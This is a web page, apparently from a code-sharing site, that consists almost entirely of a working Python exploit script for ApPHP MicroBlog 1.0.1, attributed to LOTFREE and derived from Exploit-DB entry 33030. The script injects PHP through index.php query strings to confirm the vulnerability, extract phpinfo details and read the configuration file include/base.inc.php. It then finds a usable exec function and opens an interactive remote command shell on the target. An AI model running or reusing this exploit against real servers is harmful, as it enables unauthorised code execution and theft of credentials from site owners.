扫码分享
验证:
体验盒子|
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115 116 117 118 119 120 121 122 123 124 125 126 127 128 129 130 131 132 133 |
#!/usr/bin/python import random import hashlib import urllib from base64 import b64encode as b64 import sys import re # Exploit Title: Python exploit for ApPHP MicroBlog 1.0.1 (Free Version) - RCE # Exploit Author: LOTFREE # Version: ApPHP MicroBlog 1.0.1 (Free Version) # EDB-ID: 33030 print "-= LOTFREE exploit for ApPHP MicroBlog 1.0.1 (Free Version) =-" print "original exploit by Jiko : http://www.exploit-db.com/exploits/33030/" if len(sys.argv) < 2: print "Usage: python {0} http://target/blog/index.php".format(sys.argv[0]) sys.exit() debug = False CHECK_FMT = "{0}?{1});echo(base64_decode('{2}')=/" INFO_FMT = "{0}?{1});echo(base64_decode('{2}'));phpinfo();echo(base64_decode('{3}')=/" # to read include/base.inc.php CONFIG_FMT = "{0}?{1});echo(base64_decode('{2}'));readfile(base64_decode('aW5jbHVkZS9iYXNlLmluYy5waHA%3D'));echo(base64_decode('{3}')=/" EXEC_FMT = "{0}?{1});echo(base64_decode('{2}'));{3}(base64_decode('{4}'));echo(base64_decode('{5}')=/" index_url = sys.argv[1] char = chr(random.randint(97,122)) start_mark = hashlib.md5(str(random.random())).hexdigest()[:15] end_mark = hashlib.md5(str(random.random())).hexdigest()[:15] print "[*] Testing for vulnerability..." random_mark = hashlib.md5(str(random.random())).hexdigest()[:15] url = CHECK_FMT.format(index_url, char, b64(random_mark)) if debug: print url r = urllib.urlopen(url) if not random_mark in r.read(): print "[-] Website is not vulnerable :'(" sys.exit() print "[+] Website is vulnerable" print def extract_between(data): global start_mark global end_mark if start_mark not in data or end_mark not in data: print "[-] Oops. Something went wrong :(" return "" return data.split(start_mark, 1)[1].split(end_mark, 1)[0] print "[*] Fecthing phpinfo" url = INFO_FMT.format(index_url, char, b64(start_mark), b64(end_mark)) if debug: print url r = urllib.urlopen(url) output = extract_between(r.read()) output = re.compile(r'<[^<]*?/?>').sub(' ', output) interesting_values = [ "PHP Version", "System", "Loaded Configuration File", "Apache Version", "Server Root", "DOCUMENT_ROOT", "allow_url_", "disable_functions", "open_basedir", "safe_mode", "User/Group"] for line in output.split("\n"): line = line.strip() if line: for value in interesting_values: if line.startswith(value): print "\t" + line print print "[*] Fetching include/base.inc.php" url = CONFIG_FMT.format(index_url, char, b64(start_mark), b64(end_mark)) if debug: print url r = urllib.urlopen(url) output = extract_between(r.read()) print output print exec_functions = ["system", "passthru", "exec", "shell_exec"] valid_exec = None print "[*] Testing remote execution" for func in exec_functions: # trying to exec "echo LOTFREE" url = EXEC_FMT.format(index_url, char, b64(start_mark), func, "ZWNobyBMT1RGUkVF", b64(end_mark)) if debug: print url r = urllib.urlopen(url) output = extract_between(r.read()) if "LOTFREE" in output: valid_exec = func break if valid_exec is None: print "[-] Did not manage to execute commands :(" sys.exit() print "[+] Remote exec is working with {0}() :)".format(valid_exec) print "Submit your commands, type exit to quit" while True: try: cmd = raw_input("> ").strip() except EOFError: print break if cmd == "exit": print break if (len(cmd) % 3) > 0: padding = " " * (3 - len(cmd) % 3) cmd = cmd + padding url = EXEC_FMT.format(index_url, char, b64(start_mark), func, b64(cmd), b64(end_mark)) if debug: print url r = urllib.urlopen(url) output = extract_between(r.read()) print output print |
体验盒子
